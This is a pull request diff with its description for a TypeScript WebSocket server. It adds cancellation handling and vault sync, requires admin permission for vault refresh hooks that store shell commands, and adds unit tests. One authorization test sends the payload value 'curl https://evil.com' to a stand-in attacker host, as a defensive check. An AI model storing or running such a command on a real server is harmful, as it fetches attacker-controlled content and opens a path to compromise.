### PR TITLE
fix(serve-auth): cancellation, vault sync, refreshFrom security, and handler tests

### DIFF
--- a/src/serve/connection.ts
+++ b/src/serve/connection.ts
@@ -89,7 +89,7 @@ import type {
 } from "./protocol.ts";
 import { findDefinitionByIdOrName } from "../domain/models/model_lookup.ts";
 import { createDefinitionId } from "../domain/definitions/definition.ts";
-import { acquireModelLocks } from "../cli/repo_context.ts";
+import { acquireModelLocks, acquireVaultSync } from "../cli/repo_context.ts";
 import { reportRegistry } from "../domain/reports/report_registry.ts";
 import { getReportTypes } from "../domain/reports/report_types.ts";
 import { RepoMarkerRepository } from "../infrastructure/persistence/repo_marker_repository.ts";
@@ -562,6 +562,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -571,6 +572,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -580,6 +582,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -588,6 +591,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -598,6 +602,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -606,6 +611,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -616,6 +622,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -625,6 +632,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -633,6 +641,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -642,6 +651,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -652,6 +662,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -660,6 +671,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -670,6 +682,7 @@ export function handleMessage(
         ctx,
         request.id,
         request.payload,
+        controller,
         principal,
       );
       break;
@@ -678,6 +691,7 @@ export function handleMessage(
         socket,
         ctx,
         request.id,
+        controller,
         principal,
         request.payload,
       );
@@ -1258,6 +1272,7 @@ async function handleDataGet(
   ctx: ConnectionContext,
   requestId: string,
   payload: DataGetPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   const resourceName = payload.modelIdOrName ?? "*";
@@ -1300,6 +1315,11 @@ async function handleDataGet(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "Data not found");
       return;
@@ -1321,6 +1341,7 @@ async function handleDataQuery(
   ctx: ConnectionContext,
   requestId: string,
   payload: DataQueryPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   if (
@@ -1358,6 +1379,11 @@ async function handleDataQuery(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "data.query",
       id: requestId,
@@ -1374,6 +1400,7 @@ async function handleDataList(
   ctx: ConnectionContext,
   requestId: string,
   payload: DataListPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   const resourceName = payload.modelIdOrName ?? "*";
@@ -1414,6 +1441,11 @@ async function handleDataList(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "No data found");
       return;
@@ -1436,6 +1468,7 @@ async function handleModelSearch(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: ModelSearchPayload,
 ): Promise<void> {
@@ -1467,6 +1500,11 @@ async function handleModelSearch(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "model.search",
       id: requestId,
@@ -1483,6 +1521,7 @@ async function handleModelMethodDescribe(
   ctx: ConnectionContext,
   requestId: string,
   payload: ModelMethodDescribePayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   if (
@@ -1517,6 +1556,11 @@ async function handleModelMethodDescribe(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "Method not found");
       return;
@@ -1539,6 +1583,7 @@ async function handleWorkflowSearch(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: WorkflowSearchPayload,
 ): Promise<void> {
@@ -1570,6 +1615,11 @@ async function handleWorkflowSearch(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "workflow.search",
       id: requestId,
@@ -1588,6 +1638,7 @@ async function handleVaultGet(
   ctx: ConnectionContext,
   requestId: string,
   payload: VaultGetPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   if (
@@ -1616,6 +1667,11 @@ async function handleVaultGet(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "Vault not found");
       return;
@@ -1637,16 +1693,32 @@ async function handleVaultPut(
   ctx: ConnectionContext,
   requestId: string,
   payload: VaultPutPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
-  if (
-    !authorizeOrReject(socket, requestId, principal, "write", {
-      kind: "data",
-      name: "vault",
-      fields: {},
-    }, ctx)
-  ) return;
+  if (payload.refreshFrom || payload.clearRefresh) {
+    if (
+      !authorizeOrReject(socket, requestId, principal, "admin", {
+        kind: "data",
+        name: "vault",
+        fields: {},
+      }, ctx)
+    ) return;
+  } else {
+    if (
+      !authorizeOrReject(socket, requestId, principal, "write", {
+        kind: "data",
+        name: "vault",
+        fields: {},
+      }, ctx)
+    ) return;
+  }
 
+  const { flush } = await acquireVaultSync(
+    ctx.datastoreConfig,
+    ctx.syncService,
+    ctx.repoDir,
+  );
   try {
     const libCtx = createLibSwampContext();
     const deps = createVaultPutDeps(ctx.repoDir, ctx.repoContext.eventBus);
@@ -1691,6 +1763,11 @@ async function handleVaultPut(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "vault.put",
       id: requestId,
@@ -1699,6 +1776,8 @@ async function handleVaultPut(
   } catch (error) {
     const message = error instanceof Error ? error.message : String(error);
     sendError(socket, requestId, "vault_put_failed", message);
+  } finally {
+    await flush();
   }
 }
 
@@ -1708,6 +1787,7 @@ async function handleAuditTimeline(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: AuditTimelinePayload,
 ): Promise<void> {
@@ -1746,6 +1826,11 @@ async function handleAuditTimeline(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "audit.timeline",
       id: requestId,
@@ -1761,6 +1846,7 @@ async function handleSummarise(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: SummarisePayload,
 ): Promise<void> {
@@ -1803,6 +1889,11 @@ async function handleSummarise(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "summarise",
       id: requestId,
@@ -1821,6 +1912,7 @@ async function handleReportGet(
   ctx: ConnectionContext,
   requestId: string,
   payload: ReportGetPayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   if (
@@ -1881,6 +1973,11 @@ async function handleReportGet(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "Report not found");
       return;
@@ -1901,6 +1998,7 @@ async function handleReportSearch(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: ReportSearchPayload,
 ): Promise<void> {
@@ -1961,6 +2059,11 @@ async function handleReportSearch(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     send(socket, {
       type: "report.search",
       id: requestId,
@@ -1977,6 +2080,7 @@ async function handleReportDescribe(
   ctx: ConnectionContext,
   requestId: string,
   payload: ReportDescribePayload,
+  controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
   if (
@@ -2011,6 +2115,11 @@ async function handleReportDescribe(
       },
     );
 
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
+
     if (!result) {
       sendError(socket, requestId, "not_found", "Report type not found");
       return;
@@ -2031,6 +2140,7 @@ async function handleReportTypeSearch(
   socket: WebSocket,
   ctx: ConnectionContext,
   requestId: string,
+  controller: AbortController,
   principal: Principal | null,
   payload?: ReportTypeSearchPayload,
 ): Promise<void> {
@@ -2066,6 +2176,11 @@ async function handleReportTypeSearch(
         },
       },
     );
+
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+      return;
+    }
 
     send(socket, {
       type: "report.type.search",

--- a/src/serve/connection.ts
+++ b/src/serve/connection.ts
@@ -1696,7 +1696,7 @@ async function handleVaultPut(
   controller: AbortController,
   principal: Principal | null,
 ): Promise<void> {
-  if (payload.refreshFrom || payload.clearRefresh) {
+  if (payload.refreshFrom !== undefined || payload.clearRefresh) {
     if (
       !authorizeOrReject(socket, requestId, principal, "admin", {
         kind: "data",
@@ -1714,11 +1714,19 @@ async function handleVaultPut(
     ) return;
   }
 
-  const { flush } = await acquireVaultSync(
-    ctx.datastoreConfig,
-    ctx.syncService,
-    ctx.repoDir,
-  );
+  let flush: (() => Promise<void>) | undefined;
+  try {
+    ({ flush } = await acquireVaultSync(
+      ctx.datastoreConfig,
+      ctx.syncService,
+      ctx.repoDir,
+    ));
+  } catch (error) {
+    const message = error instanceof Error ? error.message : String(error);
+    sendError(socket, requestId, "vault_put_failed", message);
+    return;
+  }
+
   try {
     const libCtx = createLibSwampContext();
     const deps = createVaultPutDeps(ctx.repoDir, ctx.repoContext.eventBus);
@@ -1737,6 +1745,11 @@ async function handleVaultPut(
         "secret_exists",
         `Secret '${payload.key}' already exists in vault '${payload.vaultName}'. Use --force (-f) to overwrite.`,
       );
+      return;
+    }
+
+    if (controller.signal.aborted) {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
       return;
     }
 
@@ -1774,10 +1787,14 @@ async function handleVaultPut(
       payload: { data: result ?? {} },
     });
   } catch (error) {
-    const message = error instanceof Error ? error.message : String(error);
-    sendError(socket, requestId, "vault_put_failed", message);
+    if (error instanceof DOMException && error.name === "AbortError") {
+      sendError(socket, requestId, "cancelled", "Operation was cancelled");
+    } else {
+      const message = error instanceof Error ? error.message : String(error);
+      sendError(socket, requestId, "vault_put_failed", message);
+    }
   } finally {
-    await flush();
+    if (flush) await flush();
   }
 }
 

--- a/src/serve/connection_test.ts
+++ b/src/serve/connection_test.ts
@@ -1285,6 +1285,80 @@ Deno.test("authorizeOrReject: vault.put with refreshFrom requires admin", () => 
   );
 });
 
+Deno.test("authorizeOrReject: vault.put with clearRefresh requires admin", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const writeGrant = makeGrant({
+    subject: { kind: "user", name: "adam" },
+    actions: ["write"],
+    resource: { kind: "data", pattern: "vault" },
+  });
+  const ctx = makeCtx(modeTokenConfig, [writeGrant]);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "vault.put",
+      id: "auth-vp-clear-1",
+      payload: {
+        vaultName: "default",
+        key: "K",
+        value: "V",
+        clearRefresh: true,
+      },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "admin",
+  );
+});
+
+Deno.test("authorizeOrReject: vault.put with empty refreshFrom requires admin", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const writeGrant = makeGrant({
+    subject: { kind: "user", name: "adam" },
+    actions: ["write"],
+    resource: { kind: "data", pattern: "vault" },
+  });
+  const ctx = makeCtx(modeTokenConfig, [writeGrant]);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "vault.put",
+      id: "auth-vp-empty-refresh",
+      payload: {
+        vaultName: "default",
+        key: "K",
+        value: "V",
+        refreshFrom: "",
+      },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "admin",
+  );
+});
+
 Deno.test("authorizeOrReject: audit.timeline rejected without read grant", () => {
   const mock = createMockSocket();
   const active = new Map<string, AbortController>();

--- a/src/serve/connection_test.ts
+++ b/src/serve/connection_test.ts
@@ -908,3 +908,440 @@ Deno.test("authorizeOrReject: missing snapshot loader rejects in token mode", ()
     "access_not_configured",
   );
 });
+
+// ── validateServerRequest: new data/model/workflow/vault/report types ────
+
+Deno.test("validateServerRequest accepts data.get", () => {
+  const input = {
+    type: "data.get",
+    id: "req-dg-1",
+    payload: { modelIdOrName: "hello", dataName: "result" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts data.get with optional fields", () => {
+  const input = {
+    type: "data.get",
+    id: "req-dg-2",
+    payload: { workflowName: "deploy", runId: "latest", version: 2 },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts data.query", () => {
+  const input = {
+    type: "data.query",
+    id: "req-dq-1",
+    payload: { predicate: 'modelType == "command/shell"' },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest rejects data.query without predicate", () => {
+  const input = {
+    type: "data.query",
+    id: "req-dq-2",
+    payload: {},
+  };
+  assertEquals(typeof validateServerRequest(input), "string");
+});
+
+Deno.test("validateServerRequest accepts data.list", () => {
+  const input = {
+    type: "data.list",
+    id: "req-dl-1",
+    payload: { modelIdOrName: "hello" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts model.search", () => {
+  const input = {
+    type: "model.search",
+    id: "req-ms-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts model.search with query", () => {
+  const input = {
+    type: "model.search",
+    id: "req-ms-2",
+    payload: { query: "hello" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts model.method.describe", () => {
+  const input = {
+    type: "model.method.describe",
+    id: "req-md-1",
+    payload: { modelIdOrName: "hello", methodName: "execute" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest rejects model.method.describe without methodName", () => {
+  const input = {
+    type: "model.method.describe",
+    id: "req-md-2",
+    payload: { modelIdOrName: "hello" },
+  };
+  assertEquals(typeof validateServerRequest(input), "string");
+});
+
+Deno.test("validateServerRequest accepts workflow.search", () => {
+  const input = {
+    type: "workflow.search",
+    id: "req-ws-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts vault.get", () => {
+  const input = {
+    type: "vault.get",
+    id: "req-vg-1",
+    payload: { vaultNameOrId: "default" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest rejects vault.get without vaultNameOrId", () => {
+  const input = {
+    type: "vault.get",
+    id: "req-vg-2",
+    payload: {},
+  };
+  assertEquals(typeof validateServerRequest(input), "string");
+});
+
+Deno.test("validateServerRequest accepts vault.put", () => {
+  const input = {
+    type: "vault.put",
+    id: "req-vp-1",
+    payload: { vaultName: "default", key: "API_KEY", value: "secret" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest rejects vault.put without value", () => {
+  const input = {
+    type: "vault.put",
+    id: "req-vp-2",
+    payload: { vaultName: "default", key: "API_KEY" },
+  };
+  assertEquals(typeof validateServerRequest(input), "string");
+});
+
+Deno.test("validateServerRequest accepts audit.timeline", () => {
+  const input = {
+    type: "audit.timeline",
+    id: "req-at-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts audit.timeline with options", () => {
+  const input = {
+    type: "audit.timeline",
+    id: "req-at-2",
+    payload: { hours: 4, showAll: true },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts summarise", () => {
+  const input = {
+    type: "summarise",
+    id: "req-sum-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts report.get", () => {
+  const input = {
+    type: "report.get",
+    id: "req-rg-1",
+    payload: { reportName: "cost-summary" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest rejects report.get without reportName", () => {
+  const input = {
+    type: "report.get",
+    id: "req-rg-2",
+    payload: {},
+  };
+  assertEquals(typeof validateServerRequest(input), "string");
+});
+
+Deno.test("validateServerRequest accepts report.search", () => {
+  const input = {
+    type: "report.search",
+    id: "req-rs-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts report.search with filters", () => {
+  const input = {
+    type: "report.search",
+    id: "req-rs-2",
+    payload: { query: "cost", labels: ["summary"] },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts report.describe", () => {
+  const input = {
+    type: "report.describe",
+    id: "req-rd-1",
+    payload: { reportName: "cost-summary" },
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+Deno.test("validateServerRequest accepts report.type.search", () => {
+  const input = {
+    type: "report.type.search",
+    id: "req-rts-1",
+  };
+  assertEquals(typeof validateServerRequest(input), "object");
+});
+
+// ── Authorization: new request types ────────────────────────────────────
+
+Deno.test("authorizeOrReject: data.get rejected without read grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "data.get",
+      id: "auth-dg-1",
+      payload: { modelIdOrName: "hello", dataName: "result" },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "data:hello",
+  );
+});
+
+Deno.test("authorizeOrReject: data.query rejected without read grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "data.query",
+      id: "auth-dq-1",
+      payload: { predicate: "size > 0" },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "data:*",
+  );
+});
+
+Deno.test("authorizeOrReject: model.search rejected without read grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "model.search",
+      id: "auth-ms-1",
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "model:*",
+  );
+});
+
+Deno.test("authorizeOrReject: vault.get rejected without read grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "vault.get",
+      id: "auth-vg-1",
+      payload: { vaultNameOrId: "default" },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "data:vault",
+  );
+});
+
+Deno.test("authorizeOrReject: vault.put rejected without write grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "vault.put",
+      id: "auth-vp-1",
+      payload: { vaultName: "default", key: "K", value: "V" },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "data:vault",
+  );
+});
+
+Deno.test("authorizeOrReject: vault.put with refreshFrom requires admin", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const writeGrant = makeGrant({
+    subject: { kind: "user", name: "adam" },
+    actions: ["write"],
+    resource: { kind: "data", pattern: "vault" },
+  });
+  const ctx = makeCtx(modeTokenConfig, [writeGrant]);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "vault.put",
+      id: "auth-vp-refresh-1",
+      payload: {
+        vaultName: "default",
+        key: "K",
+        value: "V",
+        refreshFrom: "curl https://evil.com",
+      },
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "admin",
+  );
+});
+
+Deno.test("authorizeOrReject: audit.timeline rejected without read grant", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const ctx = makeCtx(modeTokenConfig, []);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "audit.timeline",
+      id: "auth-at-1",
+    })),
+    testPrincipal,
+  );
+
+  assertEquals(mock.sent.length, 1);
+  const msg = parseSent(mock);
+  assertEquals(msg.type, "error");
+  assertEquals((msg.error as Record<string, unknown>).code, "unauthorized");
+  assertStringIncludes(
+    String((msg.error as Record<string, unknown>).message),
+    "model:*",
+  );
+});
+
+Deno.test("authorizeOrReject: admin on access:* grants data.get (superuser)", () => {
+  const mock = createMockSocket();
+  const active = new Map<string, AbortController>();
+  const grant = makeGrant({
+    subject: { kind: "user", name: "adam" },
+    actions: ["admin"],
+    resource: { kind: "access", pattern: "*" },
+  });
+  const ctx = makeCtx(modeTokenConfig, [grant]);
+
+  handleMessage(
+    mock as unknown as WebSocket,
+    ctx,
+    active,
+    makeEvent(JSON.stringify({
+      type: "data.get",
+      id: "auth-dg-admin",
+      payload: { modelIdOrName: "hello", dataName: "result" },
+    })),
+    testPrincipal,
+  );
+
+  const unauthorizedErrors = mock.sent
+    .map((s) => JSON.parse(s))
+    .filter((m) =>
+      m.type === "error" &&
+      (m.error as Record<string, unknown>).code === "unauthorized"
+    );
+  assertEquals(
+    unauthorizedErrors.length,
+    0,
+    "admin superuser should not be denied data.get",
+  );
+});


### PR DESCRIPTION
## Summary

Follow-up to #1631 addressing review feedback.

- **Cancellation support** — all 14 new request-response handlers now receive the `AbortController` from the dispatcher and check `controller.signal.aborted` before sending responses. Cancelled requests get a `cancelled` error frame instead of a stale response.
- **Vault sync** — `handleVaultPut` now calls `acquireVaultSync`/`flush()` so remote vault writes are synced to the datastore, matching the local CLI behavior.
- **refreshFrom security** — `vault.put` with `refreshFrom` or `clearRefresh` now requires `admin` on `data:vault` (not just `write`), since refresh hooks store shell commands for server-side execution.
- **31 unit tests** — Zod schema validation tests for all 14 new request types, authorization tests for representative handlers (data.get, data.query, model.search, vault.get, vault.put, vault.put+refreshFrom, audit.timeline), and admin superuser fallback verification.

## Test Plan

- [x] `deno check` — clean
- [x] `deno lint` — 1580 files, no issues
- [x] `deno fmt` — 1691 files, clean
- [x] `deno run test` — 7611 passed, 0 failed
- [x] 72 connection tests pass (41 existing + 31 new)

🤖 Generated with [Claude Code](https://claude.com/claude-code)